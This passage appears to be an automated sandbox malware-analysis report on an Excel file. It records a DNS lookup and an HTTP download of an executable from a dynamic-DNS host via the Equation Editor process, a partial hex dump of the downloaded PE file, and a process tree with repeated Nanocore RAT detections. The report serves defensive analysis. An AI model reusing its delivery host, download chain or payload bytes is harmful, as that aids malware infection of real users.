May 3, 2021 14:55:42.628243923 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.628252983 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.628267050 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.628281116 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.628293037 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.628302097 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.628329039 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.629457951 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:43.240855932 CEST	49165	80	192.168.2.22	172.245.45.28

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2021 14:55:40.334424973 CEST	52197	53	192.168.2.22	8.8.8.8
May 3, 2021 14:55:40.393349886 CEST	53	52197	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 3, 2021 14:55:40.334424973 CEST	192.168.2.22	8.8.8.8	0xccae	Standard query (0)	myhostisstillgood11.zapto.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 3, 2021 14:55:40.393349886 CEST	8.8.8.8	192.168.2.22	0xccae	No error (0)	myhostisstillgood11.zapto.org		172.245.45.28	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

myhostisstillgood11.zapto.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	172.245.45.28	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 14:55:40.605653048 CEST	0	OUT	GET /dashboard/docs/images/nd.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: myhostisstillgood11.zapto.org Connection: Keep-Alive
May 3, 2021 14:55:40.807997942 CEST	2	IN	HTTP/1.1 200 OK Date: Mon, 03 May 2021 12:55:40 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3 Last-Modified: Mon, 03 May 2021 07:04:16 GMT ETag: "923fb-5c16791e13768" Accept-Ranges: bytes Content-Length: 599035 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 29 81 e9 50 47 d2 e9 50 47 d2 e9 50 47 d2 2a 5f 18 d2 eb 50 47 d2 e9 50 46 d2 49 50 47 d2 2a 5f 1a d2 e6 50 47 d2 bd 73 77 d2 e3 50 47 d2 2e 56 41 d2 e8 50 47 d2 52 69 63 68 e9 50 47 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e4 d6 24 5f 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 64 00 00 00 d0 01 00 00 04 00 00 61 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 84 00 00 a0 00 00 00 00 d0 02 00 c8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3c 62 00 00 00 10 00 00 00 64 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 74 12 00 00 00 80 00 00 00 14 00 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 a8 01 00 00 a0 00 00 00 06 00 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c8 0b 00 00 00 d0 02 00 00 0c 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1)PGPGPG_PGPFIPG_PGswPG.VAPGRichPGPEL$_da4@@8.text<bd `.rdatath@@.dataX\|@.ndataP.rsrc@@
May 3, 2021 14:55:40.808027983 CEST	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 48 47 42 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 64 82 40 00 e9 42 01 00 00 53 56 8b 35 54 47 42 00 8d 45 a4 57 Data Ascii: U\}t+}FEuHHGBHPuuud@BSV5TGBEWPu\@eEEPul@}e`@FRVVU+MM3FQNUMVTUFPEEPM\@EEPEPu
May 3, 2021 14:55:40.808039904 CEST	4	IN	Data Raw: e9 2a 15 00 00 8b 88 20 48 42 00 89 88 e0 47 42 00 e9 19 15 00 00 8b 45 e0 8d 34 85 e0 47 42 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d e4 8b 44 85 d8 89 0e e9 03 15 00 00 ff 34 95 e0 47 42 00 56 e9 36 14 00 00 8b 0d 10 3f 42 00 8b 35 30 82 40 00 3b cb Data Ascii: * HBGBE4GB3;#MD4GBV6?B50@;tRQE$?B;PQj*uP@jWF;tTj\VF:Eu9]tBtWBWB;t=uW@uEE
May 3, 2021 14:55:40.808057070 CEST	6	IN	Data Raw: 00 00 6a 01 8b f8 89 55 c8 e8 39 11 00 00 59 3b f3 59 89 55 c8 75 08 3b f8 7c 08 7e 8c eb 12 3b f8 73 08 8b 45 e4 e9 d5 0f 00 00 0f 86 78 ff ff ff 8b 45 e8 e9 c7 0f 00 00 6a 01 e8 07 11 00 00 8b f8 6a 02 89 55 c8 89 7d 08 e8 f8 10 00 00 59 89 55 Data Ascii: jU9Y;YUu;\|~;sExEjjU}YUYE$t+@Z+S;tS>#3-3;;u3;t;t3G;t3E
May 3, 2021 14:55:41.008461952 CEST	7	IN	Data Raw: 1f 56 e8 00 47 00 00 39 5d dc 7c 09 50 57 e8 d4 41 00 00 eb 0b 3b c3 74 07 c7 45 fc 01 00 00 00 56 ff 15 20 81 40 00 e9 8f 0a 00 00 6a 02 e8 fc 0b 00 00 50 e8 c4 45 00 00 3b c3 89 45 08 74 13 8b d8 ff 73 14 57 e8 9c 41 00 00 ff 73 18 e9 77 f5 ff Data Ascii: VG9]\|PWA;tEV @jPE;EtsWAswjMEQPj F;EE1Pj@(@;EjEjEEuEuSuUt2EPEPh@uUtEpVAEpW@
May 3, 2021 14:55:41.008495092 CEST	8	IN	Data Raw: 56 89 95 78 ff ff ff 58 83 fe 03 75 0f 68 00 0c 00 00 57 53 ff 75 e4 e8 9d 0c 00 00 50 57 ff 75 c8 53 ff 75 88 ff 75 08 ff 15 0c 80 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 cf 00 00 00 68 19 00 02 00 e8 ee 06 00 00 6a 33 8b f8 e8 a5 06 00 00 3b fb Data Ascii: VxXuhWSuPWuSuu@u]uhj3;MEQMVQSPW@3Au.}t9Mt}uEEr639]VE<cM\h\|j;YU9]MtQVPW@SSSMSQVP
May 3, 2021 14:55:41.008507013 CEST	10	IN	Data Raw: 16 ff 75 08 57 e8 48 38 00 00 59 59 ff 75 08 ff 15 94 82 40 00 eb 30 c7 45 fc 01 00 00 00 88 1f eb 25 8b 0d 50 1d 42 00 53 23 c8 51 6a 0b ff 75 f8 ff 15 60 82 40 00 39 5d d8 74 0b 53 53 ff 75 f8 ff 15 50 82 40 00 8b 45 fc 01 05 e8 47 42 00 33 c0 Data Ascii: uWH8YYu@0E%PBS#Qju`@9]tSSuP@EGB3_^[e*@@@@@@@o@@@Y@@A@b@j@@@F@Y@@@2@G@Y@@@^@@c@@.@.@@@D@e@5@@
May 3, 2021 14:55:41.008519888 CEST	11	IN	Data Raw: 00 ac 42 00 56 e8 d1 32 00 00 56 e8 aa 2c 00 00 50 68 00 c0 42 00 e8 c0 32 00 00 53 57 ff 15 e0 80 40 00 3b c3 a3 08 f9 41 00 8b f0 0f 86 e5 00 00 00 bb f8 78 41 00 a1 58 47 42 00 8b fe f7 d8 1b c0 25 00 7e 00 00 05 00 02 00 00 3b f0 72 02 8b f8 Data Ascii: BV2V,PhB2SW@;AxAXGB%~;rWS]Q=XGBuzjESP-Eur}ui}Instu`}softuW}NulluNEEAHBE;XGB,EuEu?Ep;vEujY;
May 3, 2021 14:55:41.008538961 CEST	13	IN	Data Raw: 15 b0 80 40 00 ff 15 c0 80 40 00 25 ff ff ff bf 66 3d 06 00 a3 4c 47 42 00 74 11 53 e8 89 31 00 00 3b c3 74 07 68 00 0c 00 00 ff d0 be a0 82 40 00 56 e8 05 31 00 00 56 ff 15 b8 80 40 00 8d 74 06 01 38 1e 75 eb 6a 0b e8 5d 31 00 00 6a 09 e8 56 31 Data Ascii: @@%f=LGBtS1;th@V1V@t8uj]1jV1jDGBJ1;tjtOGB@U8@S@HBSD$8h`PShAl@h@h@?B,@BPU,=B"@GB@uD$"Bt$P}&P@D$
May 3, 2021 14:55:41.008554935 CEST	14	IN	Data Raw: 15 34 81 40 00 57 ff 15 24 81 40 00 85 f6 75 e8 5f 83 25 14 fd 41 00 00 5e c3 a1 14 fd 41 00 eb 0b 8b 48 08 3b 4c 24 04 74 0a 8b 00 85 c0 75 f1 40 c2 04 00 33 c0 eb f9 56 8b 74 24 08 56 e8 d7 ff ff ff 85 c0 75 03 40 eb 2c 6a 0c 6a 40 ff 15 28 81 Data Ascii: 4@W$@u_%A^AH;L$tu@3Vt$Vu@,jj@(@tL$pHAA3^SUV5TGBWj+3;tPhB!'TPBSWShL@hB0BxB}&8PBuSWhj@h$@h_&Wh
May 3, 2021 14:55:41.008573055 CEST	15	IN	Data Raw: 00 00 eb e0 ff 74 24 30 ff 74 24 30 68 11 01 00 00 ff 35 18 3f 42 00 ff 15 60 82 40 00 ff 74 24 30 ff 74 24 30 53 e8 ed 03 00 00 e9 50 03 00 00 8b 44 24 2c 8b 7c 24 24 3b d9 a3 38 0d 42 00 75 4d 8b 35 38 82 40 00 6a 01 57 89 3d 48 47 42 00 ff d6 Data Ascii: t$0t$0h5?B`@t$0t$0SPD$,\|$$;8BuM58@jW=HGBjWLBjjWAF5(?BjW@j?B3@8B@35GB;\|>u1Uvt$jUh5?B`@39-?B9.h8B

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2400 Parent PID: 584

General

Start time:	14:54:43
Start date:	03/05/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fb60000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2500 Parent PID: 584

General

Start time:	14:55:04
Start date:	03/05/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2780 Parent PID: 2500

General

Start time:	14:55:08
Start date:	03/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	599035 bytes
MD5 hash:	669DD51D521BE84D6F2C45012115FC5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: MSBuild.exe PID: 2764 Parent PID: 2780

General

Start time:	14:55:09
Start date:	03/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0xf00000
File size:	261944 bytes
MD5 hash:	7FB523211C53D4AB3213874451A928AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	moderate

Chronological Activities

Analysis Process: vbc.exe PID: 2868 Parent PID: 2780

General

Start time:	14:55:14
Start date:	03/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	599035 bytes
MD5 hash:	669DD51D521BE84D6F2C45012115FC5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: MSBuild.exe PID: 2872 Parent PID: 2868

General

Start time:	14:55:17
Start date:	03/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x1340000
File size:	261944 bytes
MD5 hash:	7FB523211C53D4AB3213874451A928AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	moderate

Chronological Activities

Analysis Process: vbc.exe PID: 2804 Parent PID: 2868

General

Start time:	14:55:22
Start date:	03/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	599035 bytes
MD5 hash:	669DD51D521BE84D6F2C45012115FC5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: MSBuild.exe PID: 2524 Parent PID: 2804

General

Start time:	14:55:23
Start date:	03/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x1340000
File size:	261944 bytes
MD5 hash:	7FB523211C53D4AB3213874451A928AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	moderate

Chronological Activities

Analysis Process: vbc.exe PID: 2388 Parent PID: 2804

General

Start time:	14:55:28
Start date:	03/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	599035 bytes
MD5 hash:	669DD51D521BE84D6F2C45012115FC5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: MSBuild.exe PID: 3060 Parent PID: 2388

General

Start time:	14:55:29
Start date:	03/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x70000
File size:	261944 bytes
MD5 hash:	7FB523211C53D4AB3213874451A928AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: vbc.exe PID: 1620 Parent PID: 2388

General

Start time:	14:55:33
Start date:	03/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	599035 bytes
MD5 hash:	669DD51D521BE84D6F2C45012115FC5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: MSBuild.exe PID: 552 Parent PID: 1620

General

Start time:	14:55:35
Start date:	03/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0xa00000
File size:	261944 bytes
MD5 hash:	7FB523211C53D4AB3213874451A928AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	moderate

Chronological Activities

Analysis Process: vbc.exe PID: 2272 Parent PID: 1620

General

Start time:	14:55:40
Start date:	03/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	599035 bytes
MD5 hash:	669DD51D521BE84D6F2C45012115FC5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: MSBuild.exe PID: 1688 Parent PID: 2272

General

Start time:	14:55:42
Start date:	03/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0xa00000
File size:	261944 bytes
MD5 hash:	7FB523211C53D4AB3213874451A928AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	moderate

Chronological Activities

Analysis Process: vbc.exe PID: 1840 Parent PID: 2272

General

Start time:	14:55:47
Start date:	03/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	599035 bytes
MD5 hash:	669DD51D521BE84D6F2C45012115FC5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
